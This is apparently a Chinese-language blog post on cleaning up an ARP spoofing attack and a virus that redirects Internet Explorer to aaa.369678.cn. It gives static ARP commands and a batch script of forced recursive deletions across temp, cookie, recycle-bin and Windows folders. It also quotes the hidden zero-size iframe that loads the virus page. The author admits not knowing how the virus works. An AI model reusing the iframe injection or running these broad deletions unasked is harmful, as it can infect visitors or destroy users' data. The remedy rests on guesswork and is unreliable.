最近在客户那里遇到了这个病毒:aaa.369678.cn,由于网络同时还存在ARP攻击的状况,导致整个网络陷入瘫痪,所以这里就一并分析解决。
最近在客户那里遇到了这个病毒:aaa.369678.cn,由于网络同时还存在ARP攻击的状况,导致整个网络陷入瘫痪,所以这里就一并分析解决。
一、ARP 攻击及其相关 ARP病毒、木马的简单处理:
杀毒的办法这里就不详细介绍了,推荐几款杀毒软件:Macfee、Avira AntiVir PersonalEdition、Symantec AntiVirus v10.2等。 其中Macfee、Symantec软件比较适合双核大内存的电脑使用,如果你的配置是单核的,还是用Avira AntiVir PersonalEdition吧,效果不错,我就是用这个。 国产的杀毒软件当然也可以。企业环境特别是Win2003域的环境下,Symantec的企业版是比较好的选择。 呵呵,说了这么多啰唆的话,有点跑题了。
【表现的症状】:
a、无法上网或者上网很慢
b、ping网关的时候反应很慢:
正常的时候是这样的:
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64
被ARP攻击的时候,常常 time 值会达到几百、几千、甚至干脆丢包:Request timed out.
c、查看本机的ARP映射表,会发现本机的网关MAC地址跟别的正常电脑不一样:
arp -a
192.168.1.1 00-08-5c-b0-8c-3d Dynamic
【解决办法】
1、进入命令行方式:
开始-》运行-》cmd
2、在客户机上建立网关(路由器)的静态ARP映射:
arp -s <网关IP> <网关MAC地址>
上面两步可以保证你在重启前能上网…… 那重启后呢? ………… 这个,由于黔驴技穷,暂时只是用批处理的方法来进行的。 把以下命令复制到命令行运行:
cd /d %ProgramFiles%
echo @echo off >> AntiARP.BAT
echo arp -s 网关IP 网关MAC地址 >> AntiARP.BAT
这时在你的c盘program files下面会生成一个 AntiARP.BAT 文件,右键单击 “发送到”-》“桌面快捷方式”。 接着把生成的快捷方式复制到 开始菜单 -》 所有程序 -》启动 里面。这样,每次启动的时候就会自动运行静态映射命令。
至于怎么把快捷方式复制到“启动”文件夹,如此“高难度”的问题实在不适合在这里讲解,你要真不会就发Email给我:finaltry@sina.com.cn
怎样才能获得网关的IP地址、网关的MAC地址?这个可以直接到路由器上看,也可以借助一个叫“Anti Arp Sniffer V2.0”的软件,在这里下载:
Anti Arp Sniffer V2.0
www.newjian.com
二、清理aaa.369678.cn病毒。
【表现症状】
此病毒非常可恶,它会让你的IE浏览器每次打开网站的时候都连接到 aaa.369678.cn 网站,并且从这个网站下载多种木马、病毒,让你现有杀毒软件(卡巴斯基、avest等)不断地跳出病毒提示,严重拖慢浏览速度,并最终导致IE崩溃。
分析网页代码,发现每个页面都有如下代码:
<iframe src="http://aaa.369678.cn/****.htm" width="0" height="0"></iframe>
用“奇虎360”、超级兔子等常规软件扫描,没有发现异常。 可每次开IE浏览的时候都会如此。上网找了一些资料后才把它摆平。
【解决办法】
1、进入系统的安全模式(注意:是不带网络连接的)
如果你的安全模式被破坏,请用System Repair Engineer修复你的安全模式。
2、打开“任务管理器”
3、把以下内容复制或者新建一个批处理文件:
@echo off
echo 正在清理,请稍等......
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
rd /s/q %temp% & md %temp%
rd /s/q "%userprofile%\Local Settings\Temporary Internet Files"
4、在“任务管理器”的“进程”页面,结束Explorer.exe 进程,然后把上面 3、的命令黏贴到命令行方式执行或者保存为批处理文件再执行!
5、收工。
【备注】此病毒有点特别,工作原理还不是很清楚,好像不是浏览器劫持,全面修复IE后依然无效。估计是网络内部有电脑中毒了,然后利用系统的漏洞不断攻击其他电脑。